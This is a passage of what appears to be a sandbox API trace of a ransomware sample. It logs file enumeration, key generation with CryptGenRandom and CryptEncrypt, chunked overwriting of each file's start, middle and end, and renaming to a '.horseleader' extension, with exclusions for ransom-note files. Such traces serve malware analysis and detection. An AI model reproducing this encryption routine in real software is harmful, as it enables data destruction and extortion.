lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.432] CloseHandle (hObject=0x21c) returned 1 [0222.432] GetProcessHeap () returned 0x780000 [0222.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.433] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader") returned 93 [0222.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.horseleader")) returned 1 [0222.434] GetProcessHeap () returned 0x780000 [0222.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.434] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x16771fb0, ftCreationTime.dwHighDateTime=0x1cb12b4, ftLastAccessTime.dwLowDateTime=0x16771fb0, ftLastAccessTime.dwHighDateTime=0x1cb12b4, ftLastWriteTime.dwLowDateTime=0x46536400, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0222.434] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0222.434] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0222.434] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".horseleader") returned 0x0 [0222.434] lstrcmpW (lpString1="Office32WW.xml", lpString2="#Decrypt#.txt") returned 1 [0222.434] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0222.434] lstrlenW (lpString=".testttjffg") returned 11 [0222.434] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpSrch=".testttjffg") 
returned 0x0 [0222.434] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.434] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.434] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.435] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0222.435] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0222.435] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4274) returned 1 [0222.435] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0222.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.437] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0222.437] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.438] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.438] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.438] CloseHandle (hObject=0x21c) returned 1 [0222.438] GetProcessHeap () returned 0x780000 [0222.438] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.438] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader") returned 93 [0222.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.horseleader")) returned 1 [0222.439] GetProcessHeap () returned 0x780000 [0222.439] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.439] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec54b6b0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xec54b6b0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x4a687710, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0222.439] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0222.439] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0222.439] StrStrIW (lpFirst="ose.exe", lpSrch=".horseleader") returned 0x0 [0222.440] lstrcmpW (lpString1="ose.exe", lpString2="#Decrypt#.txt") returned 1 [0222.440] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0222.440] lstrlenW (lpString=".testttjffg") returned 11 [0222.440] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpSrch=".testttjffg") returned 0x0 [0222.440] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.440] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.440] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.452] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0222.452] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0222.452] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=174440) returned 1 [0222.452] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.452] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.460] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.460] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.460] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.460] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.462] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.462] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.462] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.462] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.464] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.464] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.464] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.464] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.464] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.464] CloseHandle (hObject=0x21c) returned 1 [0222.465] GetProcessHeap () returned 0x780000 [0222.465] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.465] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader") returned 86 [0222.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.horseleader")) returned 1 [0222.466] GetProcessHeap () returned 0x780000 [0222.466] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.466] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xde72fbf0, ftCreationTime.dwHighDateTime=0x1cb0d0b, ftLastAccessTime.dwLowDateTime=0xde72fbf0, ftLastAccessTime.dwHighDateTime=0x1cb0d0b, ftLastWriteTime.dwLowDateTime=0x49c902c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xdded3805, 
dwReserved1=0xda7b4a6d, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0222.466] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0222.466] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0222.466] StrStrIW (lpFirst="osetup.dll", lpSrch=".horseleader") returned 0x0 [0222.466] lstrcmpW (lpString1="osetup.dll", lpString2="#Decrypt#.txt") returned 1 [0222.466] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0222.466] lstrlenW (lpString=".testttjffg") returned 11 [0222.741] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", lpSrch=".testttjffg") returned 0x0 [0222.742] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.742] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.742] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.745] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0222.746] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0222.746] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=7378792) returned 1 [0222.746] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.746] ReadFile (in: 
hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.767] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.767] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.767] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3823b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.768] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.783] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.784] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x704768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.784] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.852] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.852] WriteFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.852] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.852] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0222.853] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0222.853] CloseHandle (hObject=0x21c) returned 1 [0222.853] GetProcessHeap () returned 0x780000 [0222.853] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0222.877] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader") returned 89 [0222.877] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.horseleader")) returned 1 [0222.880] GetProcessHeap () returned 0x780000 [0222.880] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0222.881] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9c380f0, 
ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc9c380f0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x465d00f0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0222.891] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0222.891] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0222.891] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".horseleader") returned 0x0 [0222.891] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="#Decrypt#.txt") returned 1 [0222.891] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0222.897] lstrlenW (lpString=".testttjffg") returned 11 [0222.897] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpSrch=".testttjffg") returned 0x0 [0222.897] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0222.898] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0222.898] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0222.898] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0222.898] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") 
returned 0x0 [0222.898] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=36233052) returned 1 [0222.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.899] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0222.944] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0222.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11447ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0222.944] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.030] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2288f5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.030] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.118] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.118] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.119] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.119] CloseHandle (hObject=0x21c) returned 1 [0223.119] GetProcessHeap () returned 0x780000 [0223.119] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.119] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader") returned 91 [0223.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.horseleader")) returned 1 [0223.120] GetProcessHeap () 
